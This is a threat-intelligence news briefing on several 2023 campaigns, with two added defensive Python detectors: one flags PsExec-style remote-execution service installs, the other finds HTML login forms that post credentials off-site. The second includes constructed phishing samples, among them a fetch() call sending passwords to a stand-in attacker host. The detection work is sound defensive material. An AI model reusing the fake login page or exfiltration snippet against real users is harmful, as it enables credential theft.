Cyware Daily Threat Intelligence
Daily Threat Briefing • Aug 18, 2023
The BlackCat ransomware has evolved its tactics, with a new version noticed by Microsoft experts recently. This version incorporates Impacket and a PsExec-like tool called RemCom for lateral movement and remote code execution on compromised networks. Another unidentified threat group used a mass-spreading technique against Zimbra Collaboration users to steal credentials. The campaign, active since April, has been targeting small and medium-sized businesses and government entities.
In a different development, researchers crafted an attack scenario for iOS 16 devices, creating a synthetic Airplane Mode to remain undetected. Apple clarified that this doesn't exploit a specific vulnerability but is a method for persistence after the initial compromise.
APT29 targets NATO-aligned MoFA
Researchers at EclecticIQ encountered an attack campaign by the Russia-linked APT29, targeting Ministries of Foreign Affairs of NATO-aligned countries. The group used PDF files masquerading as communications from the German embassy. The PDFs contained diplomatic invitation lures, with one delivering a variant of the Duke malware. The second PDF was presumably used for reconnaissance, to notify the attackers whether a victim opened the message.
Access major auction house network for $120,000
Initial Access Brokers (IABs) breached a major auction house's network and are offering access to the compromised network for $120,000, according to researchers at threat intelligence company Flare. The IAB advertisements on the forum, posted between May 1 and July 27, show that over 100 companies were targeted across 18 industries, with organizations in the U.S., Australia, and the U.K. being the most common targets. The finance and retail sectors accounted for the largest number of attacks.
New BlackCat ransomware variant surfaces
Microsoft uncovered a new version of the BlackCat ransomware, which incorporates tools like Impacket and RemCom to facilitate lateral movement and remote code execution. Impacket, a toolset for network protocol research and penetration testing, and RemCom, an open-source alternative to PsExec, facilitate ransomware deployment and remote access within the compromised network.
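Tools like RemCom and PsExec run a command on a remote host by copying a service binary over an administrative share and registering it as a Windows service, so a new-service-installed event (System log, Event ID 7045) on a workstation that rarely gets new services is a useful detection point. The following is an added example, not code from Microsoft's report or from the RemCom or Impacket projects: it parses a constructed key=value export of Windows System events and flags service installs that look like PsExec-style remote execution. The service names (RemComSvc, PSEXESVC) and the ADMIN$ path pattern are assumed indicators for this example; real exports use a different layout and attackers can rename the service.

```python
import re
from dataclasses import dataclass

# Assumed indicators for this example: default service names registered by
# PsExec-style remote-execution tools (RemComSvc by RemCom, PSEXESVC by PsExec).
SUSPICIOUS_SERVICE_NAMES = {"remcomsvc", "psexesvc"}
SUSPICIOUS_IMAGE_PATTERNS = [
    re.compile(r"\\ADMIN\$\\", re.IGNORECASE),   # binary launched from the ADMIN$ share
    re.compile(r"remcom", re.IGNORECASE),
    re.compile(r"psexesvc", re.IGNORECASE),
]

@dataclass
class ServiceInstall:
    host: str
    service_name: str
    image_path: str
    account: str

# Constructed sample log: a simplified "key=value" export of Windows System events.
# EventID 7045 means "a new service was installed in the system".
SAMPLE_LOG = r"""
EventID=7045 Host=WS01 ServiceName=RemComSvc ImagePath=C:\Windows\RemComSvc.exe Account=LocalSystem
EventID=7045 Host=WS02 ServiceName=Spooler ImagePath=C:\Windows\System32\spoolsv.exe Account=LocalSystem
EventID=7045 Host=FS01 ServiceName=PSEXESVC ImagePath=\\FS01\ADMIN$\PSEXESVC.exe Account=LocalSystem
EventID=4624 Host=WS01 LogonType=3 Account=corp\backup
EventID=7045 Host=DC01 ServiceName=wuauserv ImagePath=C:\Windows\System32\svchost.exe Account=LocalSystem
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_service_installs(log_text: str) -> list[ServiceInstall]:
    """Return every Event ID 7045 record in the export as a ServiceInstall."""
    installs = []
    for line in log_text.splitlines():
        fields = dict(FIELD_RE.findall(line))
        if fields.get("EventID") != "7045":
            continue
        installs.append(ServiceInstall(
            host=fields.get("Host", ""),
            service_name=fields.get("ServiceName", ""),
            image_path=fields.get("ImagePath", ""),
            account=fields.get("Account", ""),
        ))
    return installs

def is_remote_exec_service(ev: ServiceInstall) -> bool:
    """True when the service name or image path matches a PsExec-style tool indicator."""
    if ev.service_name.lower() in SUSPICIOUS_SERVICE_NAMES:
        return True
    return any(p.search(ev.image_path) for p in SUSPICIOUS_IMAGE_PATTERNS)

def flag_remote_exec_installs(log_text: str) -> list[ServiceInstall]:
    """All service installs in the export that match a remote-execution indicator."""
    return [ev for ev in parse_service_installs(log_text) if is_remote_exec_service(ev)]

if __name__ == "__main__":
    for ev in flag_remote_exec_installs(SAMPLE_LOG):
        print(f"{ev.host}: suspicious service {ev.service_name!r} -> {ev.image_path}")
```

Because the service name and binary path are attacker-controlled, a production rule would also baseline which hosts normally receive new services and correlate the 7045 event with the preceding network logon (Event ID 4624, logon type 3) from the same source, rather than relying on the default names alone.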
Cuba operators exploit Veeam flaw
The Cuba ransomware group has been seen deploying a comprehensive toolset, including BUGHATCH (a custom downloader), BURNTCIGAR (an antimalware killer), Wedgecut (a host enumeration utility), and the Metasploit and Cobalt Strike frameworks. The criminals used two exploits, a Veeam Backup & Replication vulnerability (CVE-2023-27532) and the ZeroLogon bug (CVE-2020-1472), against the critical infrastructure sector in the U.S. and a Latin America-based IT integrator.
Post-exploit persistence technique on iOS 16
Researchers from Jamf Threat Labs found a new post-exploit persistence technique on iOS 16 that allows attackers to maintain access to an Apple device even when the victim believes it is in Airplane Mode. Through this technique, the attacker remains hidden while maintaining a cellular network connection for a malicious application. By blocking cellular data access for specific apps and altering the alert window to appear as if Airplane Mode is enabled, attackers can create an artificial Airplane Mode that hides their activities and maintains connectivity for their rogue application.
Phishing campaign steals Zimbra credentials
ESET uncovered an ongoing phishing campaign targeting Zimbra Collaboration users, aiming to harvest their account credentials. The phishing emails lure victims by posing as email server updates, account deactivations, or similar issues, and directing them to click on an attached HTML file. The file opens a fake Zimbra login page designed to collect credentials, which are then exfiltrated to a server controlled by the attackers.
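An HTML attachment that renders a login form locally and submits it somewhere other than the organization's own mail server is the core of the mechanic described above, and that is something a mail gateway or analyst script can check for before the file ever reaches a user. The following is an added example, not code from ESET's report: it scans an HTML attachment for forms containing a password field and reports any host, other than the organization's trusted webmail host, that the form action or an inline script would send the credentials to. The sample attachments and the domains in them are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Absolute URLs inside <script> blocks (a form can be posted via fetch() instead of an action).
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")

class CredentialFormScanner(HTMLParser):
    """Record every <form>, whether it has a password field, and URLs seen in scripts."""

    def __init__(self):
        super().__init__()
        self.forms = []          # {"action": str, "has_password": bool}
        self.script_urls = []
        self._current = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data.
        if self._in_script:
            self.script_urls.extend(URL_RE.findall(data))

def credential_exfil_targets(html_text: str, trusted_host: str) -> list[str]:
    """Hosts other than trusted_host that a password form in html_text could submit to."""
    scanner = CredentialFormScanner()
    scanner.feed(html_text)
    has_password_form = any(f["has_password"] for f in scanner.forms)
    if not has_password_form:
        return []
    candidates = [f["action"] for f in scanner.forms if f["has_password"]]
    candidates += scanner.script_urls
    targets = set()
    for url in candidates:
        host = urlparse(url).hostname
        if host and host.lower() != trusted_host.lower():
            targets.add(host.lower())
    return sorted(targets)

# Constructed sample 1: lookalike Zimbra login page posting to an attacker-style host.
SAMPLE_ATTACHMENT = """
<html><body>
<h2>Zimbra Web Client - Your mailbox will be deactivated</h2>
<form method="post" action="https://mail-update.example.invalid/collect.php">
  <input type="text" name="username" value="user@example.com">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Constructed sample 2: the same form, but submitting to the organization's own webmail host.
BENIGN_PAGE = """
<form method="post" action="https://mail.example.com/zimbra/login">
  <input type="text" name="username"><input type="password" name="password">
</form>
"""

# Constructed sample 3: no form action; a script posts the fields with fetch().
SCRIPT_VARIANT = """
<form id="login"><input type="password" name="password"></form>
<script>
  document.getElementById("login").onsubmit = function (e) {
    e.preventDefault();
    fetch("https://drop.example.invalid/p", {method: "POST", body: new FormData(e.target)});
  };
</script>
"""

if __name__ == "__main__":
    for name, doc in [("attachment", SAMPLE_ATTACHMENT), ("benign", BENIGN_PAGE), ("script", SCRIPT_VARIANT)]:
        print(name, "->", credential_exfil_targets(doc, "mail.example.com"))
```

A relative form action yields no hostname and is ignored here; in a file opened from disk it would post to a file:// URL, which is itself a reason to treat any HTML attachment containing a password field as suspicious regardless of where it submits.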